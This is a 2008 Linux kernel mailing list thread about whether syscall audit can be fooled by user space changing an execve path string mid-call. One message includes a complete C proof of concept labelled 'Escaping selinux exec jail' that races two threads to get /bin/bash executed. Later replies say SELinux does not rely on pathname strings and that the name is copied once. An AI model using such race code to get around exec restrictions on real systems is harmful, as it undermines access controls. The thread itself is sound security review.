* System call audit
From: Mathieu Desnoyers @ 2008-05-13 0:06 UTC
To: David Woodhouse, linux-kernel; +Cc: mingo

Hi David,

As I am looking into the system-wide system call tracing problem, I
start to wonder how auditsc deals with the fact that user-space could
concurrently change the content referred to by the __user pointers.

This would be the case for execve. Consider a program with two
threads: one executes execve syscalls while the other modifies the
userspace string containing the name of the program to execute.

Since we have two copy_from_user, one in auditsc and one in the
real execve() function, the string passed to the OS could differ from
the string seen by auditsc.

Regards,

Mathieu

--
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
* Re: System call audit
From: David Woodhouse @ 2008-05-13 9:24 UTC
To: Mathieu Desnoyers; +Cc: linux-kernel, mingo

On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> Hi David,
>
> As I am looking into the system-wide system call tracing problem, I
> start to wonder how auditsc deals with the fact that user-space could
> concurrently change the content referred to by the __user pointers.

In general we have to copy the content into kernel space, audit it, and
then act on it from there. See the explanation on the IPC audit patch at
http://lwn.net/Articles/125350/ for example.

Auditing one thing and then acting on another would be simply broken.

> This would be the case for execve. Consider a program with two
> threads: one executes execve syscalls while the other modifies the
> userspace string containing the name of the program to execute.

I was going to suggest that that attack vector won't work, because
execve() kills all threads. But all you have to do to avoid that is put
the data in question into a shared writable mmap and modify it from
another _process_. And in fact I suspect there's a combination of CLONE_
flags which would avoid the thread-killing behaviour anyway.

> Since we have two copy_from_user, one in auditsc and one in the
> real execve() function, the string passed to the OS could differ from
> the string seen by auditsc.

Right. Don't Do That Then. The audit code should see what's _actually_
given to the child process. The audit/execve code has changed since I
last looked, but I think it's probably OK because it's reading the
contents of the new program's mm on the way back from the execve()
system call -- before ever giving the CPU back to that process.

--
dwmw2
* Re: System call audit
From: Mathieu Desnoyers @ 2008-05-13 12:51 UTC
To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> I was going to suggest that that attack vector won't work, because
> execve() kills all threads. But all you have to do to avoid that is put
> the data in question into a shared writable mmap and modify it from
> another _process_. And in fact I suspect there's a combination of CLONE_
> flags which would avoid the thread-killing behaviour anyway.

Even better: if execve fails, it doesn't kill the threads. Therefore,
all we have to do is busy-loop doing failing execve() calls and
atomically change the string to what we want to be executed. Can anyone
test the sample snippet in a context where executing /bin/bash is
disallowed on an SMP system? I don't have a selinux setup handy. I
suppose that as soon as selinux sees one /bin/bash exec, it will
kill the process, so a few runs would be required in order to hit
the race.

/*
 * Escaping selinux exec jail
 *
 * build with gcc -pthread -o escape-selinux escape-selinux.c
 *
 * Mathieu Desnoyers
 * License: GPL
 */

#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <signal.h>

static char modstring[] = "$bin/bash";

/* Keep calling exec on a path that is only valid part of the time. */
void *thr1(void *arg)
{
	while (1) {
		/* Fails while the first byte is '$'; argv[0] and the
		 * (char *)NULL terminator are required by execl(). */
		execl(modstring, "bash", (char *)NULL);
	}
	return ((void *)1);
}

/* Flip the first byte between an invalid and a valid path. */
void *thr2(void *arg)
{
	/* volatile so the compiler keeps both stores */
	volatile char *p = modstring;

	while (1) {
		p[0] = '$';
		p[0] = '/';
	}
	return ((void *)2);
}

int main(void)
{
	int err;
	pthread_t tid1, tid2;
	void *tret;

	err = pthread_create(&tid1, NULL, thr1, NULL);
	if (err != 0)
		exit(1);

	err = pthread_create(&tid2, NULL, thr2, NULL);
	if (err != 0)
		exit(1);

	sleep(10);

	/* Neither thread returns: this blocks until an execl() succeeds
	 * and replaces the process image, or the process is killed. */
	err = pthread_join(tid1, &tret);
	if (err != 0)
		exit(1);

	err = pthread_join(tid2, &tret);
	if (err != 0)
		exit(1);

	return 0;
}

--
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
* Re: System call audit
From: David Woodhouse @ 2008-05-13 12:59 UTC
To: Mathieu Desnoyers; +Cc: linux-kernel, mingo

On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> Even better: if execve fails, it doesn't kill the threads. Therefore,
> all we have to do is busy-loop doing failing execve() calls and
> atomically change the string to what we want to be executed. Can anyone
> test the sample snippet in a context where executing /bin/bash is
> disallowed on an SMP system? I don't have a selinux setup handy.

You were talking about audit earlier. Now you seem to be talking about
selinux.

--
dwmw2
* Re: System call audit
From: Mathieu Desnoyers @ 2008-05-13 13:12 UTC
To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> You were talking about audit earlier. Now you seem to be talking about
> selinux.

I thought selinux hooked into syscall audit? (Sorry, I am new to the
kernel auditing field.) The race I refer to is in the auditsc.c kernel
code, so syscall audit is what I am talking about. I mention selinux
here only because, as I understand it, it happens to be one
module-based callback which can hook into syscall audit.

Mathieu

--
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
* Re: System call audit
From: Stephen Smalley @ 2008-05-13 13:19 UTC
To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo

On Tue, 2008-05-13 at 09:12 -0400, Mathieu Desnoyers wrote:
> I thought selinux hooked into syscall audit? (Sorry, I am new to the
> kernel auditing field.) The race I refer to is in the auditsc.c kernel
> code, so syscall audit is what I am talking about. I mention selinux
> here only because, as I understand it, it happens to be one
> module-based callback which can hook into syscall audit.

SELinux is a user of the audit subsystem in terms of generating audit
messages for permission denials. It doesn't rely on any inputs from the
audit subsystem.

--
Stephen Smalley
National Security Agency
* Re: System call audit
From: Mathieu Desnoyers @ 2008-05-13 13:51 UTC
To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> You were talking about audit earlier. Now you seem to be talking about
> selinux.

Actually, getname/putname seems to make sure the name is only copied
once per audit context. So it should be OK.

Mathieu

--
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
* Re: System call audit
From: Stephen Smalley @ 2008-05-13 13:12 UTC
To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo

On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> Can anyone
> test the sample snippet in a context where executing /bin/bash is
> disallowed on an SMP system? I don't have a selinux setup handy. I
> suppose that as soon as selinux sees one /bin/bash exec, it will
> kill the process, so a few runs would be required in order to hit
> the race.

SELinux doesn't base any of its decisions on pathname strings provided
by the user (or pathnames at all, for that matter; SELinux is
attribute/label-based).

--
Stephen Smalley
National Security Agency